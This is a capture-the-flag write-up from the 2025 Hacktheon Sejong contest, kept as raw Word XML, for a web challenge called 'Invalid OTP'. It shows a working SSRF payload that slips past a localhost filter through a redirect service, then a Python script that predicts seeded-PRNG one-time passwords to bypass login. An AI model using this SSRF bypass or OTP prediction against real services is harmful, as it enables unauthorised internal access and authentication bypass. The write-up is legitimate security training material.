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5"/>
        <w:gridCol w:w="8371"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A6786" w14:paraId="1B1F11F0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FE2D329" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="000A6904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이름</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BCBA150" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="000A69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Team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8816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DF85699" w14:textId="1844FF31" w:rsidR="003A6786" w:rsidRDefault="006B7000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B7000">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>EHC_fumosquad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A6786" w14:paraId="1642AE7F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11FFDC50" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="000A6904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이름</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB39E6A" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="000A69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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48D10892" w14:textId="423EC86F" w:rsidR="003A6786" w:rsidRDefault="008E41C6">
            <w:pPr>
              <w:jc w:val="center"/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/>
                <w:i/>
              </w:rPr>
              <w:t>Invalid OTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A6786" w14:paraId="31E7A997" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="521"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="172CEF5E" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="000A690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문제 풀이과정 작성 (캡처화면 필수) / Write-up Details (The screenshot is mandatory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A6786" w14:paraId="6D211828" w14:textId="77777777" w:rsidTr="007D1063">
        <w:trPr>
          <w:trHeight w:val="11888"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4E1B4E95" w14:textId="56B41AF7" w:rsidR="008E41C6" w:rsidRDefault="008E41C6" w:rsidP="008E41C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="567B5CFB" w14:textId="7CB65537" w:rsidR="008E41C6" w:rsidRDefault="008E41C6" w:rsidP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Link: </w:t>
            </w:r>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r w:rsidRPr="00A43C4B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>http://hacktheon2025-challs-alb-1354048441.ap-northeast-2.elb.amazonaws.com:39406/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3D0F2255" w14:textId="6CAFB42A" w:rsidR="008E41C6" w:rsidRPr="006B7000" w:rsidRDefault="008E41C6" w:rsidP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After </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>enter</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> the link, in f12, we can see some image have source like this: &lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="008E41C6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>img style="max-width:80%" src="/image_render?url=https://cdn.jsdelivr.net/gh/ott3r07/nexora@51d875a2dcc807005a9f9f416c1636bf686e7405/logo.png"/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27129F84" w14:textId="77777777" w:rsidR="006B7000" w:rsidRDefault="006B7000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21F0497F" w14:textId="77777777" w:rsidR="008E41C6" w:rsidRDefault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Endpoint /image_render is vulnerable by ssrf. How about localhost???</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="490C186E" w14:textId="77777777" w:rsidR="008E41C6" w:rsidRDefault="008E41C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E41C6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="030613DE" wp14:editId="2BB794A4">
                  <wp:extent cx="6469380" cy="115838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711" cy="116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1F623" w14:textId="01491CC2" w:rsidR="008E41C6" w:rsidRDefault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filtered, but I see something familiar ….: </w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r w:rsidRPr="00A43C4B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.leviathansecurity.com/blog/bypassing-ssrf-filters-using-r3dir</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0A47C8E5" w14:textId="1B2B3B1B" w:rsidR="008E41C6" w:rsidRDefault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Using this method, we can bypass this filter. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7045E4BA" w14:textId="77777777" w:rsidR="008E41C6" w:rsidRDefault="008E41C6" w:rsidP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 first, we access this link: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648740DD" w14:textId="2AAAA9EE" w:rsidR="008E41C6" w:rsidRDefault="008E41C6" w:rsidP="008E41C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E41C6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>http://hacktheon2025-challs-alb-1354048441.ap-northeast-2.elb.amazonaws.com:39406/image_render?url=https%3A%2F%2F307.r3dir.me%2F--to%2F%3Furl%3Dhttp%3A%2F%2Flocalhost</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550AE92A" w14:textId="77777777" w:rsidR="008E41C6" w:rsidRDefault="008E41C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E41C6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6785EB32" wp14:editId="7173E0A6">
                  <wp:extent cx="4389120" cy="24879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52" cy="249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1BD13" w14:textId="5C7FC618" w:rsidR="008E41C6" w:rsidRDefault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Nice, now we can see the source and all seed of all session. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CDF63DB" w14:textId="2D686EFB" w:rsidR="00F73AFA" w:rsidRDefault="00F73AFA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F73AFA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB1876B" wp14:editId="17A4EEC3">
                  <wp:extent cx="3172268" cy="1152686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6593F" w14:textId="42F5C873" w:rsidR="00F73AFA" w:rsidRDefault="00F73A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Here is the credential.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A17B094" w14:textId="6AE0CB67" w:rsidR="00F73AFA" w:rsidRDefault="00F73A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Login and phase 2 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> comingggg, bypass otp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="726A4BEA" w14:textId="72EF52D4" w:rsidR="00F73AFA" w:rsidRDefault="00F73AFA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="624994E9" w14:textId="77777777" w:rsidR="00F73AFA" w:rsidRDefault="00F73AFA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D15D7C5" w14:textId="77777777" w:rsidR="00F73AFA" w:rsidRDefault="00F73AFA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="098BC81C" w14:textId="65FB1133" w:rsidR="00F73AFA" w:rsidRDefault="008E41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 read source, it is a python program with a otp random with seed in otp_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>seed.json</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>. If you guess right otp, then flag</w:t>
            </w:r>
            <w:r w:rsidR="00F73AFA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BCA2C6" w14:textId="3E2793C3" w:rsidR="00F73AFA" w:rsidRDefault="00F73AFA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F73AFA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F5C671A" wp14:editId="66EBF9F4">
                  <wp:extent cx="6645910" cy="258381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BA26" w14:textId="77777777" w:rsidR="00F73AFA" w:rsidRDefault="00F73AFA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="255EDA9F" w14:textId="77777777" w:rsidR="00F73AFA" w:rsidRDefault="00F73AFA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A2709DC" w14:textId="654E97E7" w:rsidR="00F73AFA" w:rsidRDefault="00F73A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proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>otp</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">_gen endpoint will print the result of random. Now, we need to guess the right otp. Observe the otp_gen endpoint, i </w:t>
            </w:r>
            <w:r w:rsidR="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">think it is not different from random with seed, so I write a code to predict next otp, and it true (I will show code later). But, when I test it in web, it </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>isn’t</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> true. After some try, I realize that in endpoint /otp, endpoint /otp_gen is accessed 2 time. Therefore, I must take the result following the next result. Here is the code to gen otp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1326620C" w14:textId="428C13C4" w:rsidR="00953D79" w:rsidRDefault="00953D79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12DF22E4" w14:textId="154A52C2" w:rsidR="00953D79" w:rsidRDefault="00953D79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F558C5B" w14:textId="53C01E02" w:rsidR="00953D79" w:rsidRDefault="00953D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“””</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B419846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>import random</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7B93B1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</w:p>
          <w:p w14:paraId="55DDB41B" w14:textId="5C3E296E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seed = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">1745647185  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> go to otp_seed.json to get it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3553629A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rng = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>random.Random</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>(seed)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AFA6BE9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</w:p>
          <w:p w14:paraId="386DAF5D" w14:textId="233962C9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>otp1 = 1294646144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# go to otp_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>gen?session</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>_id to get it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62ED5F18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for i in </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>range(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>100):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47661387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    otp2 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rng.getrandbits</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">(32)  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32080CE4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    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>if( otp</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>2 == otp1):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E3616A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        otp3= </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rng.getrandbits</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>(32)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="231D1080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        otp4= </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rng.getrandbits</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>(32)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D0ED50B" w14:textId="77777777" w:rsidR="00953D79" w:rsidRP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 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="724F8FA6" w14:textId="4C7D066F" w:rsidR="00953D79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>print(otp4</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">)  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> the true otp you enter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71687DCE" w14:textId="6A868CF8" w:rsidR="00953D79" w:rsidRDefault="00953D79" w:rsidP="00953D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“””</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F741910" w14:textId="53F27C23" w:rsidR="00953D79" w:rsidRDefault="00953D79" w:rsidP="00953D79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18913856" w14:textId="162B0B1E" w:rsidR="00953D79" w:rsidRDefault="00953D79" w:rsidP="00953D79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C564981" w14:textId="4AEFA233" w:rsidR="00953D79" w:rsidRDefault="00953D79" w:rsidP="00953D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After </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>enter</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> this code in /otp endpoint, you will have flag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C0953ED" w14:textId="77777777" w:rsidR="00953D79" w:rsidRDefault="00953D79" w:rsidP="00953D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2A0DA18C" wp14:editId="439BD667">
                  <wp:extent cx="4792980" cy="2355219"/>
                  <wp:effectExtent l="0" t="0" r="762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777" cy="235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53816" w14:textId="77777777" w:rsidR="00953D79" w:rsidRDefault="00953D79" w:rsidP="00953D79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71CCD77E" w14:textId="77777777" w:rsidR="00953D79" w:rsidRDefault="00953D79" w:rsidP="00953D79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14827DCF" w14:textId="2DEAFE16" w:rsidR="00953D79" w:rsidRPr="006B7000" w:rsidRDefault="00953D79" w:rsidP="00953D79">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">FLAG: </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00953D79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>55rf_byp455_0tp_prn9_345y_cr4ck3d}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29A8ABF2" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="003A6786" w:rsidP="00AA500F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003A67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6904" w14:textId="77777777" w:rsidR="004145C3" w:rsidRDefault="004145C3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50D58A56" w14:textId="77777777" w:rsidR="004145C3" w:rsidRDefault="0041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0F49" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="003A6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4210" w14:textId="77777777" w:rsidR="000F4204" w:rsidRDefault="000F4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92FB" w14:textId="77777777" w:rsidR="000F4204" w:rsidRDefault="000F4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4BE4" w14:textId="77777777" w:rsidR="004145C3" w:rsidRDefault="004145C3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F2202AD" w14:textId="77777777" w:rsidR="004145C3" w:rsidRDefault="0041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46D8A" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="003A6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2699" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="000A690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0" locked="0" layoutInCell="1" hidden="0" allowOverlap="0" wp14:anchorId="1674E502" wp14:editId="1D823C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6350" t="6350" r="6350" b="6350"/>
              <wp:wrapSquare wrapText="bothSides"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22C85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DAE000"/>
                              <w:sz w:val="32"/>
                              <w:szCs w:val="44"/>
                            </w:rPr>
                            <w:alias w:val="제목"/>
                            <w:id w:val="-1"/>
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<w15:color w:val="DAE000"/>
                            <w:text/>
                          </w:sdtPr>
                          <w:sdtEndPr/>
                          <w:sdtContent>
                            <w:p w14:paraId="28587609" w14:textId="1519CA78" w:rsidR="003A6786" w:rsidRDefault="000A6904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>202</w:t>
                              </w:r>
                              <w:r w:rsidR="000F4204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 xml:space="preserve"> HACKTHEON SEJONG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74E502" id="shape2049" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:468.5pt;height:21.3pt;z-index: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" o:allowoverlap="f" fillcolor="#622c85" strokecolor="#4472c4 [3204]" strokeweight="1pt">
              <v:path arrowok="t"/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DAE000"/>
                        <w:sz w:val="32"/>
                        <w:szCs w:val="44"/>
                      </w:rPr>
                      <w:alias w:val="제목"/>
                      <w:id w:val="-1"/>
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<w15:color w:val="DAE000"/>
                      <w:text/>
                    </w:sdtPr>
                    <w:sdtEndPr/>
                    <w:sdtContent>
                      <w:p w14:paraId="28587609" w14:textId="1519CA78" w:rsidR="003A6786" w:rsidRDefault="000A6904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>202</w:t>
                        </w:r>
                        <w:r w:rsidR="000F4204">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/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>5</w:t>
                        </w:r>
                        <w:r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 xml:space="preserve"> HACKTHEON SEJONG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B6BA" w14:textId="77777777" w:rsidR="000F4204" w:rsidRDefault="000F4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86"/>
    <w:rsid w:val="000A6904"/>
    <w:rsid w:val="000F4204"/>
    <w:rsid w:val="00285331"/>
    <w:rsid w:val="003142CF"/>
    <w:rsid w:val="003A6786"/>
    <w:rsid w:val="004145C3"/>
    <w:rsid w:val="006B7000"/>
    <w:rsid w:val="006D1DC6"/>
    <w:rsid w:val="007D1063"/>
    <w:rsid w:val="008057ED"/>
    <w:rsid w:val="008E41C6"/>
    <w:rsid w:val="00953D79"/>
    <w:rsid w:val="00AA500F"/>
    <w:rsid w:val="00AF121B"/>
    <w:rsid w:val="00F357D1"/>
    <w:rsid w:val="00F7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F2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D7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8E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viathansecurity.com/blog/bypassing-ssrf-filters-using-r3di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acktheon2025-challs-alb-1354048441.ap-northeast-2.elb.amazonaws.com:39406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2025 HACKTHEON SEJONG</vt:lpstr>
    </vt:vector>
  </TitlesOfParts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HACKTHEON SEJONG</dc:title>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-23T12:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-26T05:32:00Z</dcterms:modified>
  <cp:version>1100.0100.01</cp:version>
</cp:coreProperties>
</file>